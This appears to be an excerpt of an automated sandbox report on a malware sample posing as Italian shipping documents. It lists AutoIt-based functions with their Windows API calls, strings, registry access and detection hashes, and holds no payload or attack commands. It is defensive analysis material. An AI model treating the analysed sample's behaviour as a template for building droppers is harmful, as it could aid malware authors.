                        Function 04172620 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 29647e61cac096d50aae8ea4e3696a32396d0a21751cfe91a3f5560d3d7b88fa
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 4041B5B1D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
                        Function 04172510 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 7933cb4628115e31cfb9be30f8e5695ce5ea5845ddb20563fcee87d85c82dde6
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: A3019278A00109EFCB44DF98C5909AEF7B5FB48310F2086D9E819A7701E730AE42DB80
                        Function 041724B0 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 02c0ad54cb2b56ddc0e13455ad42edb9d8abe4600fefd048555b01e559cc235c
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 05019278A00109EFCB48DF98C5909AEF7B5FB48310F2085D9E919A7701E730AE42DB80
                        Function 04170E80 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(?), ref: 0045953B
                        • DeleteObject.GDI32(?), ref: 00459551
                        • DestroyWindow.USER32(?), ref: 00459563
                        • GetDesktopWindow.USER32 ref: 00459581
                        • GetWindowRect.USER32(00000000), ref: 00459588
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                        • ShowWindow.USER32(?,00000004), ref: 00459865
                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                        • GetStockObject.GDI32(00000011), ref: 004598CD
                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                        • DeleteDC.GDI32(00000000), ref: 004598F8
                        • _wcslen.LIBCMT ref: 00459916
                        • _wcscpy.LIBCMT ref: 0045993A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                        • GetDC.USER32(00000000), ref: 004599FC
                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 4040870279-2373415609
                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                        Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0044181E
                        • SetTextColor.GDI32(?,?), ref: 00441826
                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                        • GetSysColor.USER32(0000000F), ref: 00441849
                        • SetBkColor.GDI32(?,?), ref: 00441864
                        • SelectObject.GDI32(?,?), ref: 00441874
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                        • GetSysColor.USER32(00000010), ref: 004418B2
                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                        • DeleteObject.GDI32(?), ref: 004418D5
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                        • FillRect.USER32(?,?,?), ref: 00441970
                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                        • String ID:
                        • API String ID: 69173610-0
                        • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                        • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                        Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?), ref: 004590F2
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                        • GetStockObject.GDI32(00000011), ref: 004592AC
                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                        • DeleteDC.GDI32(00000000), ref: 004592D6
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                        • GetStockObject.GDI32(00000011), ref: 004593D3
                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                        Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-3360698832
                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                        Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                        Download Yara Rule
                        APIs
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                        • SetCursor.USER32(00000000), ref: 0043075B
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                        • SetCursor.USER32(00000000), ref: 00430773
                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                        • SetCursor.USER32(00000000), ref: 0043078B
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                        • SetCursor.USER32(00000000), ref: 004307A3
                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                        • SetCursor.USER32(00000000), ref: 004307BB
                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                        • SetCursor.USER32(00000000), ref: 004307D3
                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                        • SetCursor.USER32(00000000), ref: 004307EB
                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                        • SetCursor.USER32(00000000), ref: 00430803
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                        • SetCursor.USER32(00000000), ref: 0043081B
                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                        • SetCursor.USER32(00000000), ref: 00430833
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                        • SetCursor.USER32(00000000), ref: 0043084B
                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                        • SetCursor.USER32(00000000), ref: 00430863
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                        • SetCursor.USER32(00000000), ref: 0043087B
                        • SetCursor.USER32(00000000), ref: 00430887
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                        • SetCursor.USER32(00000000), ref: 0043089F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Cursor$Load
                        • String ID:
                        • API String ID: 1675784387-0
                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                        Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(0000000E), ref: 00430913
                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                        • GetSysColor.USER32(00000012), ref: 00430933
                        • SetTextColor.GDI32(?,?), ref: 0043093B
                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                        • GetSysColor.USER32(0000000F), ref: 00430959
                        • CreateSolidBrush.GDI32(?), ref: 00430962
                        • GetSysColor.USER32(00000011), ref: 00430979
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                        • SetBkColor.GDI32(?,?), ref: 004309A6
                        • SelectObject.GDI32(?,?), ref: 004309B4
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                        • GetSysColor.USER32(00000011), ref: 00430A9F
                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                        • SelectObject.GDI32(?,?), ref: 00430AD0
                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                        • SelectObject.GDI32(?,?), ref: 00430AE3
                        • DeleteObject.GDI32(?), ref: 00430AE9
                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1582027408-0
                        • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                        • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                        Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 3217815495-966354055
                        • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                        • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                        Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 004566AE
                        • GetDesktopWindow.USER32 ref: 004566C3
                        • GetWindowRect.USER32(00000000), ref: 004566CA
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                        • DestroyWindow.USER32(?), ref: 00456746
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                        • IsWindowVisible.USER32(?), ref: 0045682C
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                        • GetWindowRect.USER32(?,?), ref: 00456873
                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                        • CopyRect.USER32(?,?), ref: 004568BE
                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                        • String ID: ($,$tooltips_class32
                        • API String ID: 225202481-3320066284
